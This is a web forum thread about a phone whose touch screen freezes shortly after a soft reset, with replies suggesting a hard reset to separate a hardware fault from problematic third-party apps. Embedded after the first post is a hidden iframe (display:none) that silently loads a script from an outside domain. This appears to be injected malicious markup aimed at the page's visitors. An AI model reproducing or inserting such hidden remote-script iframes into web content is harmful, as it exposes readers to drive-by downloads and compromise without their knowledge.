+ Reply to Thread

touch screen does not work

my buutons work, but my touch screen does not. When I soft reset, it works for a short time, then freezes. Suggestions?

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: touch screen does not work

Originally posted by rcyphermd
    my buutons work, but my touch screen does not. When I soft reset, it works for a short time, then freezes. Suggestions?

Thanks!
    It sounds like it could possibly be a defective unit... but a lot more information would be needed for anyone to make good troubleshooting suggestions (i.e. how long have you had it? Has it done this from the beginning? Even with no 3rd party software installed?). Knowing what little I know about the situation, if you try a hard reset and use your 7135 "for a short time" to see what happens you might be able to pretty quickly find out if it's a problem with the device itself, or if it's being caused by some software you've installed that is causing conflicts.
    Please visit my picture site: Robert-O-Rama :)

Thanks for the reply. I have had it for 2 days. It did not seem to do it at first....perhaps you are right, I have some bad software. Are there known problem apps with the phone? Thanks for trying.

Originally posted by rcyphermd
    Thanks for the reply. I have had it for 2 days. It did not seem to do it at first....perhaps you are right, I have some bad software. Are there known problem apps with the phone? Thanks for trying.
    I can't really list any particular "problem apps" by name that would cause consistent freezes after a short period of time... but if you have zero 3rd party apps installed and it doesn't freeze, and then you sync to restore your previous configuration and it starts to freeze again.... it's pretty safe to say that something you had installed is what's causing a problem.

It's only my opinion, but I believe that certain combinations of apps can trigger problems... and sometimes only trial and error can get you to a point where you have a generally trouble-free configuration.
    Please visit my picture site: Robert-O-Rama :)